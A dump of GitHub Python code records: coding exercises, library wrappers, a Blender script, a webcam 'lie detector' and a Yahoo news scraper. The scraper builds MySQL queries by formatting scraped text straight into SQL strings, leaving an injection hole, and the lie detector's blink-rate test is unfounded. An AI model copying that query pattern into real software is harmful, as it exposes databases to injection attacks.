dataPoints[0].lower()\r\nplanetData.sort(key=lambda planetData:planetData[0])\r\nwith open(\"SortedNewData.csv\",\"a+\") as f:\r\n csvWriter=csv.writer(f)\r\n csvWriter.writerow(headers)\r\n csvWriter.writerows(planetData)","repo_name":"JeeyaTalati/WebScrapping-1","sub_path":"SortedNewData.py","file_name":"SortedNewData.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"51"} +{"seq_id":"1076794862","text":"import os\nfrom georeference.settings import TEST_MODE\nfrom georeference.settings import GEOREFERENCE_PERSITENT_TMS\nfrom georeference.persistent.jobs.genericjobs import processGeorefImage\nfrom georeference.persistent.jobs.genericjobs import pushRecordToSearchIndex\nfrom georeference.utils.exceptions import GeoreferenceProcessingException\nfrom georeference.utils.process.tools import parseBoundingBoxPolygonFromFile\nfrom georeference.utils.process.tools import parseSRIDFromFile\nfrom georeference.scripts.updatetms import calculateCompressedTMS\n\n\ndef activate(georefObj, mapObj, dbsession, logger):\n \"\"\" This function activates a georeference process for a mapObj.\n\n :type georeference.models.vkdb.georeferenzierungsprozess.Georeferenzierungsprozess: georefObj\n :type georeference.models.vkdb.map.Map: mapObj\n :type sqlalchemy.orm.session.Session: dbSession\n :type logging.Logger: logger\n :return: string \"\"\"\n logger.debug('Activate georeference process with id %s ...'%georefObj.id)\n\n logger.debug('Create persistent georeference result ...')\n destPath = processGeorefImage(mapObj, georefObj, dbsession, logger)\n\n # check if the georeferencing was run correctly\n if destPath is None:\n logger.error('Something went wrong while trying to process a georeference process.')\n raise GeoreferenceProcessingException('Something went wrong while trying to process a georeference process.')\n\n logger.debug('Set map as active and update boundingbox ...')\n boundingboxFromFile = parseBoundingBoxPolygonFromFile(destPath)\n sridFromFile = parseSRIDFromFile(destPath)\n mapObj.setActive(destPath)\n mapObj.setBoundingBox(boundingboxFromFile, sridFromFile, dbsession)\n\n # for proper working of the mapping service update all pending database changes have to be commited\n if not TEST_MODE:\n dbsession.commit()\n\n # update the tile map service\n logger.info('Calculating tms cache ...')\n newTargetDirectory = os.path.join(GEOREFERENCE_PERSITENT_TMS, str(mapObj.maptype).lower())\n calculateCompressedTMS(destPath, newTargetDirectory)\n\n # push metadata record to elasticsearch index\n datarecordKey = pushRecordToSearchIndex(mapObj, dbsession, logger, georefObj)\n\n # push metadata to catalogue\n # this method has to be supported again\n # logger.debug('Push metadata record for map %s to cataloge service ...'%mapObj.id)\n # pushMapObjToCsw(mapObj, dbsession, logger)\n\n # update process\n georefObj.setActive()\n\n # flush session\n if TEST_MODE:\n dbsession.flush()\n\n return datarecordKey\n\ndef deactivate(georefObj, mapObj, dbsession, logger):\n \"\"\" This function deactivates a georeference process for a mapObj.\n\n :type georeference.models.vkdb.georeferenzierungsprozess.Georeferenzierungsprozess: georefObj\n :type georeference.models.vkdb.map.Map: mapObj\n :type sqlalchemy.orm.session.Session: dbSession\n :type logging.Logger: logger \"\"\"\n logger.debug('Deactivate georeference process with id %s ...'%georefObj.id)\n\n # reset mapObj\n mapObj.setDeactive()\n\n # update metadata record from elasticsearch\n datarecordKey = pushRecordToSearchIndex(mapObj, dbsession, logger)\n\n # logger.debug('Remove metadata record from catalog instance ...')\n # removeMapObjFromCsw(mapObj, dbsession, logger)\n\n logger.debug('Deactivate job ...')\n georefObj.setDeactive()\n\n # flush session\n if TEST_MODE:\n dbsession.flush()","repo_name":"slub/vk2-georeference","sub_path":"georeference/persistent/jobs/georeferencejobs.py","file_name":"georeferencejobs.py","file_ext":"py","file_size_in_byte":3452,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"51"} +{"seq_id":"39816800594","text":"bunker_items = {category: {} for category in input().split(', ')}\n\nline_counter = int(input())\n\nfor line in range(line_counter):\n line = input().split(' - ')\n category = line[0]\n item_name = line[1]\n performance = line[2].split(';')\n quantity = performance[0]\n quality = performance[1]\n token_quantity = quantity.split(':')\n token_quality = quality.split(':')\n quantity = int(token_quantity[1])\n quality = int(token_quality[1])\n bunker_items[category][item_name] = (quantity, quality)\n\ncount_items = 0\nquality_sum = 0\ncategories_count = len(bunker_items)\n\nfor name, items in bunker_items.items():\n for item, value in items.items():\n count_items += value[0]\n quality_sum += value[1]\nprint(f'Count of items: {count_items}')\nprint(f'Average quality: {(quality_sum/categories_count):.2f}')\n\nfor name, items in bunker_items.items():\n print(f'{name} -> {\", \".join(items)}')","repo_name":"pavel-stoykov/python_advanced","sub_path":"Exercise_04/09.bunker.py","file_name":"09.bunker.py","file_ext":"py","file_size_in_byte":920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"32816556943","text":"import array\nimport ctypes\n\nfrom utils.opus.exceptions import OpusException\n\n__author__ = 'Gareth Coles'\n\n\nclass EncoderStruct(ctypes.Structure):\n pass\n\n\nOK = 0\nAPPLICATION_AUDIO = 2049\nAPPLICATION_VOIP = 2048\nAPPLICATION_LOWDELAY = 2051\nCTL_SET_BITRATE = 4002\nCTL_SET_BANDWIDTH = 4008\n\n\nc_int_p = ctypes.POINTER(ctypes.c_int)\nc_int16_p = ctypes.POINTER(ctypes.c_int16)\nc_float_p = ctypes.POINTER(ctypes.c_float)\nEncoderStruct_p = ctypes.POINTER(EncoderStruct)\n\n\nFUNCTIONS = {\n \"opus_strerror\": ((ctypes.c_int, ), ctypes.c_char_p),\n\n # region: Encoder stuff\n \"opus_encoder_create\": (\n (ctypes.c_int, ctypes.c_int, ctypes.c_int, c_int_p),\n EncoderStruct_p\n ),\n \"opus_encode\": (\n (\n EncoderStruct_p, c_int16_p,\n ctypes.c_int, ctypes.c_char_p, ctypes.c_int32\n ),\n ctypes.c_int32\n ),\n \"opus_encoder_ctl\": (None, ctypes.c_int32),\n \"opus_encoder_destroy\": ((EncoderStruct_p, ), None),\n # endregion\n}\n\n\nclass OpusLibrary(object):\n lib = None\n\n def __init__(self):\n self.load_library(ctypes.util.find_library('opus'))\n self.setup_functions()\n\n def load_library(self, name):\n self.lib = ctypes.cdll.LoadLibrary(name)\n\n def setup_functions(self):\n for key, value in FUNCTIONS.iteritems():\n try:\n func = getattr(self.lib, key)\n except Exception:\n raise\n\n try:\n if value[0] is not None:\n func.argtypes = value[0]\n func.restype = value[1]\n except KeyError:\n pass\n\n def opus_strerror(self, code):\n return self.lib.opus_strerror(code)\n\n def opus_encoder_create(self, sampling_rate, channels, applications):\n return_value = ctypes.c_int()\n result = self.lib.opus_encoder_create(\n sampling_rate, channels, applications, ctypes.byref(return_value)\n )\n\n if return_value.value != 0:\n raise OpusException(return_value.value)\n\n return result\n\n def opus_encode(self, encoder, pcm, frame_size, data, max_data_bytes):\n result = self.lib.opus_encode(\n encoder, pcm, frame_size, data, max_data_bytes\n )\n\n if result < 0:\n raise OpusException(result)\n\n return array.array('b', data[:result]).tobytes()\n\n def opus_encoder_ctl(self, encoder, *args):\n result = self.lib.opus_encoder_ctl(encoder, *args)\n\n if result < 0:\n raise OpusException(result)\n\n return result\n\n def opus_encoder_destroy(self, encoder):\n return self.lib.opus_encoder_destroy(encoder)\n\n\nopus = OpusLibrary()\n","repo_name":"UltrosBot/Ultros","sub_path":"utils/opus/lib.py","file_name":"lib.py","file_ext":"py","file_size_in_byte":2679,"program_lang":"python","lang":"en","doc_type":"code","stars":23,"dataset":"github-code","pt":"60"} +{"seq_id":"13313960181","text":"import numpy as np\n\n\nclass FixedMultiStack:\n NumberOfStack = 3\n StackCapacity = 0\n values = None\n sizes = None\n\n def __init__(self, stack_size):\n self.values = np.empty(stack_size * self.NumberOfStack)\n self.sizes = np.empty(stack_size)\n self.StackCapacity = stack_size\n\n def stack_push(self, stack_no, value):\n if self.is_fullstack(stack_no):\n Exception(\"Stack Is Full\")\n self.values[self.sizes[stack_no] + stack_no] = value\n self.sizes[stack_no] += 1\n\n def pop(self, stack_no):\n if self.is_empty_stack(stack_no):\n Exception(\"There Is No Element to Delete In Stack\")\n val = self.values[self.index_top_of(stack_no)]\n self.values[self.index_top_of(stack_no)] = None\n self.sizes[stack_no] -= 1\n return val\n\n def index_top_of(self, stack_no):\n start = (stack_no - 1) * self.StackCapacity\n size = self.sizes[stack_no]\n return start + size\n\n def is_empty_stack(self, stack_no):\n return self.sizes[stack_no] == self.StackCapacity\n\n def is_fullstack(self, stack_no):\n return self.sizes[stack_no] == self.StackCapacity\n\n\nif __name__ == '__main__':\n a = FixedMultiStack(4)\n\n a.stack_push(1,1)\n a.stack_push(1,2)\n a.stack_push(2,1)\n a.stack_push(2,2)\n a.stack_push(2,3)\n a.stack_push(3,1)\n a.stack_push(3,2)\n a.pop(1)","repo_name":"kannan5/Algorithms-And-DataStructures","sub_path":"Stacks/FixedMultiSizeStack.py","file_name":"FixedMultiSizeStack.py","file_ext":"py","file_size_in_byte":1398,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"28588544134","text":"# 2018_05_08_22_04_25\n\nimport bpy\nfrom blender_remap.libraries.blend_iterate import blend_iterate\n\n\n# ==========\n# Safe Delete\n# ==========\n#\n# ==========\n# Description:\n# ==========\n# Deletes a group, object, or material only if it has no references in a\n# particular directory.\n#\n# ==========\n# Usage:\n# ==========\n# Explained in main file.\n#\n# ==========\n# Inputs:\n# ==========\n# - data_type: 'MESH', 'GROUP', 'MATERIAL'.\n# - project_path: Absolute project directory path to be recursively\n# searched for references.\n# - scripts_path: Absolute scripts directory path, where the\n# accompanying scripts are stored.\n#\n# ==========\n# Return:\n# ==========\n# None.\n#\ndef safe_delete(data_type, project_path, scripts_path):\n # ----------\n # Variables.\n # ----------\n\n scene = bpy.context.scene\n data = bpy.data\n obj = scene.objects.active\n script_path = scripts_path + \"\\\\\" + \"reference_check.py\"\n err_internal_reference_found = \"Exiting script: Internal reference found.\"\n err_not_source = \"Exiting script: This file must be the source of the \" \\\n \"data being renamed.\"\n dupli_group = None\n mat = None\n\n # ----------\n\n # ----------\n # If group.\n # ----------\n if data_type == \"GROUP\":\n # ----------\n # Checks.\n # ----------\n\n if (obj.dupli_group is None) or (obj.dupli_type != \"GROUP\"):\n print(\n \"Exiting script: The selected object must be a DupliGroup of \"\n \"the group trying to be deleted, just so it can be selected.\")\n # Stop the script by returning.\n return\n\n # Check for internal references.\n for obj_iter in data.objects:\n if (\n (obj_iter.dupli_group is not None)\n and (obj_iter.dupli_group == obj.dupli_group)\n and (obj_iter != obj)\n ):\n print(err_internal_reference_found)\n # Stop the script by returning.\n return\n\n # Should it only work in the source file.\n if obj.dupli_group.library is not None:\n print(err_not_source)\n # Stop the script by returning.\n return\n\n # ----------\n\n name = obj.dupli_group.name\n dupli_group = obj.dupli_group\n # ----------\n # If mesh.\n # ----------\n elif data_type == \"MESH\":\n # ----------\n # Checks.\n # ----------\n\n # FIXME Need to determine whether this is the last user of a\n # material as well? Not going to do this right now because it would\n # require creating a batch version of 'reference_check.py'.\n\n if (obj.type != \"MESH\"):\n print(\"Exiting script: Data not of type 'MESH'.\")\n # Stop the script by returning.\n return\n elif obj.dupli_group is not None: # TODO Does this work to ensure\n # that the data is of a mesh only?\n print(\n \"Exiting script: The object data cannot have a DupliGroup \"\n \"associated with it.\")\n # Stop the script by returning.\n return\n\n # Should it only work in the source file.\n if obj.data.library is not None:\n print(err_not_source)\n # Stop the script by returning.\n return\n\n # Check for internal references.\n for obj_iter in data.objects: # TODO What if there is a fake mesh?\n if (obj_iter.data == obj.data) and (obj_iter != obj):\n print(err_internal_reference_found)\n # Stop the script by returning.\n return\n\n # ----------\n\n name = obj.data.name\n # ----------\n # If material.\n # ----------\n elif data_type == \"MATERIAL\":\n # ----------\n # Checks.\n # ----------\n\n mat = obj.active_material\n\n # Should it only work in the source file.\n if mat.library is not None:\n print(err_not_source)\n # Stop the script by returning.\n return\n\n # TODO Could use users_id to do this more quickly?\n # Check for internal references.\n for obj_iter in data.objects:\n if obj_iter != obj:\n for mat_iter in obj_iter.material_slots:\n if mat_iter.material == mat:\n print(err_internal_reference_found)\n # Stop the script by returning.\n return\n\n # ----------\n\n name = obj.active_material.name\n # ----------\n # If the data type given is not valid.\n # ----------\n else:\n print(\n \"Exiting script: '%s' is not a valid data type for this \"\n \"function, which are 'MESH', 'GROUP', or 'MATERIAL'.\" % data_type)\n # Stop the script by returning.\n return\n\n print(\"----------\")\n print(\"Checking for external references.\")\n\n # Find external references by iterating through the '.blend' files in\n # the 'project_path'.\n return_codes = blend_iterate(\n project_path, # Direct argument.\n script_path, # Direct argument.\n data.filepath, # Argument to pass on.\n data_type, # Argument to pass on.\n name # Argument to pass on.\n )\n\n # No references were found.\n for return_code_iter in return_codes:\n if return_code_iter == 1:\n print(\"----------\")\n print(\"Reference was found, not deleting.\")\n print(\"----------\")\n break\n # References were found.\n else:\n if data_type == \"GROUP\":\n print(\"----------\")\n print(\"Deleting group and the selected DupliGroup.\")\n print(\"----------\")\n data.groups.remove(dupli_group)\n # Also need to delete the selected object because it is a\n # DupliGroup that will lose its reference so definitely not\n # needed anymore.\n data.objects.remove(obj)\n elif data_type == \"MESH\":\n print(\"----------\")\n print(\"Deleting selected object.\")\n print(\"----------\")\n data.objects.remove(obj)\n elif data_type == \"MATERIAL\":\n print(\"----------\")\n print(\"Deleting selected material.\")\n print(\"----------\")\n\n # Not sure if the just the bottom of the two lines below is\n # necessary.\n data.materials.remove(mat)\n bpy.ops.object.material_slot_remove()\n pass\n\n # Update the scene just in case.\n bpy.context.scene.update()\n","repo_name":"KalciferKandari/blender_remap","sub_path":"libraries/safe_delete.py","file_name":"safe_delete.py","file_ext":"py","file_size_in_byte":6615,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"21296416906","text":"# solution feels a bit verbose but it's easy to\n# read and understand so I'm sticking with it\n\ndef first_max_elem(array_list):\n max_at_index = 0\n for index, element in enumerate(array_list):\n if len(element) > len(array_list[max_at_index]):\n max_at_index = index\n return array_list[max_at_index]\n\n\nn = int(input())\n\nintersections = []\n\nfor _ in range(n):\n first_range = set()\n second_range = set()\n first_intersec, second_intersec = input().split('-')\n\n start, end = [int(i) for i in first_intersec.split(',')]\n for num in range(start, end + 1):\n first_range.add(num)\n\n start, end = [int(i) for i in second_intersec.split(',')]\n for num in range(start, end + 1):\n second_range.add(num)\n\n intersections.append(list(first_range & second_range))\n\nlongest = first_max_elem(intersections)\n\nprint(f\"Longest intersection is {longest} with length {len(longest)}\")\n","repo_name":"ZhekoGinev/SoftUni","sub_path":"Python/02-python-advanced/02-tuples-and-sets/02-exercise/05-longest-intersection.py","file_name":"05-longest-intersection.py","file_ext":"py","file_size_in_byte":921,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"60"} +{"seq_id":"23038078770","text":"#!/usr/bin/python3\n\"\"\"Function\"\"\"\n\n\nclass Student():\n \"\"\"Create class\"\"\"\n def __init__(self, first_name, last_name, age):\n self.first_name = first_name\n self.last_name = last_name\n self.age = age\n\n def to_json(self, attrs=None):\n \"\"\"same as 10-class_to_json.py\"\"\"\n if attrs is None:\n return self.__dict__\n lista = {}\n for i, c in self.__dict__.items():\n if i in attrs:\n lista[i] = c\n return lista\n","repo_name":"nicolasherrerac/holbertonschool-higher_level_programming","sub_path":"0x0B-python-input_output/10-student.py","file_name":"10-student.py","file_ext":"py","file_size_in_byte":499,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"45928440249","text":"import numpy as np\nimport pdb\nfrom rich import print\n\nif __name__ == \"__main__\":\n datasets = [\"Artificial N=100, C=3, P=2\", \"Artificial N=1000, C=3, P=2\", \"Artificial N=1000, C=3, P=10\",\n \"Artificial N=1000, C=10, P=10\", \"Artificial N=10000, C=3, P=2\", \"Artificial N=10000, C=3, P=2\",\n \"Artificial N=100000, C=10, P=10\"]\n\n filenames = [\"matrix_depth2_full.txt\", \"matrix_depth3_full.txt\", \"matrix_depth4_full.txt\", \"matrix_depth5_full.txt\",\n \"matrix_depth6_full.txt\", \"matrix_depth7_full.txt\", \"matrix_depth8_full.txt\", \"matrix_depth9_full.txt\",\n \"tree_depth2_full.txt\", \"tree_depth3_full.txt\", \"tree_depth4_full.txt\", \"tree_depth5_full.txt\",\n \"tree_depth6_full.txt\", \"tree_depth7_full.txt\", \"tree_depth8_full.txt\", \"tree_depth9_full.txt\"]\n \n for filename in filenames:\n elapsed_times = []\n with open(f\"results/final/2023-01/time_trial/{filename}\", \"r\") as file:\n for line in file.readlines():\n if \"DATASET:\" in line:\n elapsed_times.append([])\n \n if \"Elapsed time\" in line:\n elapsed_times[-1].append(float(line.split(\": \")[-1]))\n\n print(f\"{'-'*50}\\nFilename: {filename}\\n\")\n for i, dataset in enumerate(datasets):\n if len(elapsed_times[i]) < 5:\n print(f\"[red]Less than 5 simulations!![/red]\")\n\n string = \"\"\n string += f\"DATASET: {dataset}\\n\"\n string += f\" Elapsed time: {'{:.3f}'.format(np.mean(elapsed_times[i][:5]))} ± {'{:.3f}'.format(np.std(elapsed_times[i][:5]))}\\n\" \n print(string)","repo_name":"vgarciasc/CRO-DT","sub_path":"experiment_downscaler.py","file_name":"experiment_downscaler.py","file_ext":"py","file_size_in_byte":1659,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"73494985150","text":"import unittest\nimport numpy as np\n\nfrom basketballdetector.data import ClassificationDatasetBuilder, SegmentationDatasetBuilder\n\n\nclass ClassificationDatasetBuilderTestCase(unittest.TestCase):\n __NUMBER_OF_SAMPLES = 18\n __BUILDER = ClassificationDatasetBuilder('../assets/test-sample-data-classification', validation_percentage=0.5)\n\n def test_image_count(self):\n self.assertEqual(\n self.__BUILDER.number_of_images,\n self.__NUMBER_OF_SAMPLES,\n 'incorrect number of images detected'\n )\n\n def test_class_names(self):\n self.assertTrue(\n np.all(self.__BUILDER.class_names == ['ball', 'no_ball']),\n 'invalid object classes detected'\n )\n\n def test_validation_percentage(self):\n self.assertEqual(\n len(self.__BUILDER.train_dataset),\n self.__NUMBER_OF_SAMPLES / 2,\n 'train dataset was not split correctly'\n )\n self.assertEqual(\n len(self.__BUILDER.validation_dataset),\n self.__NUMBER_OF_SAMPLES / 2,\n 'validation dataset was not split correctly'\n )\n\n def test_dataset_labels(self):\n self.assertIn(\n self.__BUILDER.train_dataset.take(1).get_single_element()[1].numpy(),\n [0, 1],\n 'invalid class label in train dataset'\n )\n self.assertIn(\n self.__BUILDER.validation_dataset.take(1).get_single_element()[1].numpy(),\n [0, 1],\n 'invalid class label in validation dataset'\n )\n\n\nclass SegmentationDatasetBuilderTestCase(unittest.TestCase):\n __NUMBER_OF_SAMPLES = 36\n __BUILDER = SegmentationDatasetBuilder('../assets/test-sample-data-segmentation/', validation_percentage=0.5)\n\n def test_samples_count(self):\n self.assertEqual(\n self.__BUILDER.number_of_samples,\n self.__NUMBER_OF_SAMPLES,\n 'incorrect number of samples detected'\n )\n\n def test_validation_percentage(self):\n self.assertEqual(\n self.__BUILDER.train_dataset.cardinality().numpy(),\n self.__NUMBER_OF_SAMPLES / 2,\n 'train dataset was not split correctly'\n )\n self.assertEqual(\n self.__BUILDER.validation_dataset.cardinality().numpy(),\n self.__NUMBER_OF_SAMPLES / 2,\n 'validation dataset was not split correctly'\n )\n\n","repo_name":"peiva-git/basketball_detector_tf","sub_path":"tests/data/dataset_builder_tests.py","file_name":"dataset_builder_tests.py","file_ext":"py","file_size_in_byte":2406,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"41274546402","text":"from scipy.spatial import distance as dist\nfrom imutils.video import FileVideoStream\nfrom imutils.video import VideoStream\nfrom imutils import face_utils\nimport numpy as np\nimport argparse\nimport imutils\nimport time\nimport dlib\nimport cv2\nimport datetime\n\ndef eye_aspect_ratio(eye):\n A = dist.euclidean(eye[1], eye[5])\n B = dist.euclidean(eye[2], eye[4])\n C = dist.euclidean(eye[0], eye[3])\n ear = (A + B) / (2.0 * C)\n return ear\n\ndef mouth_aspect_ratio(mouth):\n mA = dist.euclidean(mouth[13], mouth[19])\n mB = dist.euclidean(mouth[14], mouth[18])\n mC = dist.euclidean(mouth[15], mouth[17])\n # mD = dist.euclidean(mouth[4], mouth[8])\n # mE = dist.euclidean(mouth[5], mouth[7])\n mF = dist.euclidean(mouth[12], mouth[16])\n\n mar = (mA + mB + mC) / (3.0 * mF)\n return mar\n\nap = argparse.ArgumentParser()\nap.add_argument(\"-p\", \"--shape-predictor\", required=True,\n help=\"path to facial landmark predictor\")\nap.add_argument(\"-v\", \"--video\", type=str, default=\"\",\n help=\"path to input video file\")\nargs = vars(ap.parse_args())\n\nMOUTH_AR_THRESH = 0.05\nEYE_AR_THRESH = 0.31\nMOUTH_AR_CONSEC_FRAMES = 3\nEYE_AR_CONSEC_FRAMES = 3\n\nframeCOUNTER = 0\nmCOUNTER = 0\neyeCOUNTER = 0\nmouthCOUNTER = 0\nTOTAL = 0\nmTOTAL = 0\nBlinkrate = 0\n\nprint(\"[INFO] loading facial landmark predictor...\")\ndetector = dlib.get_frontal_face_detector()\npredictor = dlib.shape_predictor(args[\"shape_predictor\"])\n\n(lStart, lEnd) = face_utils.FACIAL_LANDMARKS_IDXS[\"left_eye\"]\n(rStart, rEnd) = face_utils.FACIAL_LANDMARKS_IDXS[\"right_eye\"]\n(mStart, mEnd) = face_utils.FACIAL_LANDMARKS_IDXS[\"mouth\"]\n\nif not args.get(\"video\", False):\n vs = VideoStream(src=0).start()\n fileStream = False\nelse:\n vs = FileVideoStream(args[\"video\"]).start()\n fileStream = True\ntime.sleep(1.0)\n\nearList = []\nwhile True:\n if fileStream and not vs.more():\n break\n frame = vs.read()\n frame = imutils.resize(frame, width=500)\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n rects = detector(gray, 0)\n\n\n for rect in rects:\n shape = predictor(gray, rect)\n shape = face_utils.shape_to_np(shape)\n\n mouth = shape[mStart:mEnd]\n leftEye = shape[lStart:lEnd]\n rightEye = shape[rStart:rEnd]\n leftEAR = eye_aspect_ratio(leftEye)\n rightEAR = eye_aspect_ratio(rightEye)\n\n mar = mouth_aspect_ratio(mouth)\n ear = (leftEAR + rightEAR) / 2.0\n\n if frameCOUNTER <= 20:\n frameCOUNTER += 1\n else:\n frameCOUNTER = 0\n frameCOUNTER += 1\n earList.pop(0)\n \n earList.append(ear)\n earAverage = sum(earList) / len(earList)\n\n mouthHull = cv2.convexHull(mouth)\n leftEyeHull = cv2.convexHull(leftEye)\n rightEyeHull = cv2.convexHull(rightEye)\n cv2.drawContours(frame, [mouthHull], -1, (0, 255, 0), 1)\n cv2.drawContours(frame, [leftEyeHull], -1, (0, 255, 0), 1)\n cv2.drawContours(frame, [rightEyeHull], -1, (0, 255, 0), 1)\n\n if earAverage < EYE_AR_THRESH:\n eyeCOUNTER += 1\n cv2.putText(frame, \"Blinkrate: {:.2f}\".format(Blinkrate), (300, 60),\n cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)\n if eyeCOUNTER == 1:\n t1 = datetime.datetime.now()\n\n else:\n cv2.putText(frame, \"Blinkrate: {:.2f}\".format(Blinkrate), (300, 60),\n cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)\n if eyeCOUNTER >= EYE_AR_CONSEC_FRAMES:\n t2 = datetime.datetime.now()\n TOTAL += 1\n\n timeDiff = t2 - t1\n Blinkrate = (TOTAL / timeDiff.seconds) if timeDiff.seconds != 0 else 0\n\n eyeCOUNTER = 0\n\n if mar < MOUTH_AR_THRESH:\n mouthCOUNTER += 1\n\n elif mar >= MOUTH_AR_THRESH:\n mouthCOUNTER += 1\n if Blinkrate >= 1.25 * Blinkrate:\n # print(\"Lie\")\n cv2.putText(frame, 'Lie', (300, 90),\n cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)\n else:\n # print(\"Truth\")\n cv2.putText(frame, 'Truth', (300, 90),\n cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)\n\n cv2.putText(frame, \"Blinks: {}\".format(TOTAL), (10, 30),\n cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)\n cv2.putText(frame, \"EAR: {:.2f}\".format(earAverage), (300, 30),\n cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)\n cv2.putText(frame, \"MAR: {:.2f}\".format(mar), (10, 60),\n cv2.FONT_HERSHEY_SIMPLEX, 0.7, (0, 0, 255), 2)\n\n cv2.imshow(\"Frame\", frame)\n key = cv2.waitKey(1) & 0xFF\n\n # if the `q` key was pressed, break from the loop\n if key == ord(\"q\"):\n break\n\ncv2.destroyAllWindows()\nvs.stop()\n","repo_name":"prime626/Lie-Detector","sub_path":"lieDetector.py","file_name":"lieDetector.py","file_ext":"py","file_size_in_byte":4871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"75672386752","text":"# -*- coding: utf-8 -*-\n\"\"\"\nSpyder Editor\n\nThis is a temporary script file.\n\"\"\"\n\nimport requests\nimport re\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport dateutil.parser\nimport sys\nimport pymysql\nimport datetime\nfrom time import sleep\n\n\n\ndef crawl_news_links(url, news_topic):\n\n links = []\n\n if news_topic != 'all' :\n yahoo_r = requests.get(url.format(news_topic))\n else:\n yahoo_r = requests.get(archive)\n\n yahoo_soup = BeautifulSoup(yahoo_r.text, 'html.parser')\n\n topic = yahoo_soup.find_all('div', {'class': 'Cf'})\n\n for info in topic:\n link = \"\"\n try:\n link = info.find_all('a', href=True)[0]\n if link.get('href') != '#':\n links.append(base_url + link.get(\"href\"))\n except:\n link = None\n\n print(\"News count : {}\".format(len(links))) \n \n return links\n\ndef news_parser(links):\n\n data_list = []\n pattern = re.compile(r'<[^>]*>')\n\n for link in links:\n \n try:\n news = requests.get(link)\n single_news = BeautifulSoup(news.text, 'html.parser')\n except: sleep(10)\n \n try:\n # get news titles ##########################################################\n titles = str(single_news.find_all('h1', {'class':''})[0])\n find_tags = pattern.findall(titles)\n for tag in find_tags:\n titles = titles.replace(tag, '')\n \n # get news contents ##########################################################\n content = single_news.find_all('p')\n \n p_tmp = ''\n for p in content:\n if len(p) == 1 and type(p.contents[0]).__name__ != 'Tag':\n p = str(p).replace('

    ', '')\n p = str(p).replace('

    ', '')\n p_tmp = p_tmp + p\n \n contents = p_tmp\n \n # get image ulrs ##########################################################\n i_tmp = []\n img_link = single_news.find_all('img', class_ = \"caas-img\")\n \n for image in img_link:\n i_tmp.append(image['src'])\n\n if len(i_tmp) > 1:\n images = i_tmp[-1]\n else:\n images = None\n \n if images == '':\n images = None\n \n # image = None => default images to every topics ##########################\n \n if images == None:\n \n if news_topic == 'technology':\n images = 'https://i.screenshot.net/18rp4t4'\n elif news_topic == 'sports':\n images = 'https://i.screenshot.net/qlvzpbp'\n elif news_topic == 'finance':\n images = 'https://i.screenshot.net/n3d8gtk'\n elif news_topic == 'politics':\n images = 'https://i.screenshot.net/7d12xi2'\n elif news_topic == 'entertainment':\n images = 'https://i.screenshot.net/kmy96u0'\n elif news_topic == 'health':\n images = 'https://i.screenshot.net/32o6ziq'\n \n # get news times ##########################################################\n\n time = single_news.find_all('time')\n \n for t in time:\n d = dateutil.parser.parse(t['datetime'])\n times = d.strftime('%Y-%m-%d %H:%M:%S')\n \n # news_topic -> news_topics_ch[idx]\n \n if contents == '' or contents == '更多 NOWnews 今日新聞報導' or contents == ' 更多 NOWnews 今日新聞報導' or len(contents)<15:\n print(\"this news has bkank content : \"+ str(titles))\n break\n \n data_list.append([news_topics_ch[idx], times, titles, contents, images, link])\n except:\n continue\n \n return data_list\n\ndef save_to_db(news_topic, data_list):\n conn = pymysql.connect(host=ip, user=user, passwd=passwd, db=db, charset=\"utf8\")\n cur = conn.cursor() \n \n datetime_object = datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n print(datetime_object)\n\n if(len(data_list)==0):\n print(\"repeat !!!\")\n else:\n for data in data_list: # (0:news_topic, 1:times, 2:titles, 3:contents, 4:images, 5:link)\n try:\n cur.execute(\"INSERT INTO newslist (news_title, news_content, news_picture, news_url, news_topic, news_info, news_date, created_at, updated_at) VALUES ('%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s', '%s')\" % (data[2], data[3], data[4], data[5], data[0], data[1], data[1], datetime_object, datetime_object))\n except Exception :print(\"發生異常 in insert data to db\")\n cur.close() \n conn.commit() \n conn.close() \n print(\"Save to DB successfully !!!\")\n\ndef cheacker_from_db(topic,data_list):\n today = datetime.date.today()\n oneday = datetime.timedelta(days=1)\n yesterday = today - oneday\n nextday = today + oneday+ oneday\n\n conn = pymysql.connect(host=ip, user=user, passwd=passwd, db=db, charset=\"utf8\")\n cur = conn.cursor()\n\n try:\n sql = \"SELECT news_url FROM newslist WHERE created_at >='\"+str(yesterday)+\"' AND created_at <'\"+str(nextday)+\"' AND news_topic='\"+str(topic)+\"\\'\" \n print(sql)\n cur.execute(sql)\n result = cur.fetchall()\n except Exception :print(\"發生異常 in select from db\")\n\n link_list = list()\n for one_url in result:\n link_list.append(one_url[0])\n\n if len(link_list) == 0:\n #表示裡面所有的新聞都沒有 所以要加入新的新聞\n print(\"All news are new one!\")\n return data_list\n else:\n new_data_list = []\n if(len(link_list)>0):\n for data in data_list:\n if data[5] not in link_list:\n print(\"add_new_news: \" + data[2])\n new_data_list.append(data)\n #else:\n # print(\"repeat: in now data \"+data[5])\n return new_data_list\n \ndef blank_content_checker_db():\n\n conn = 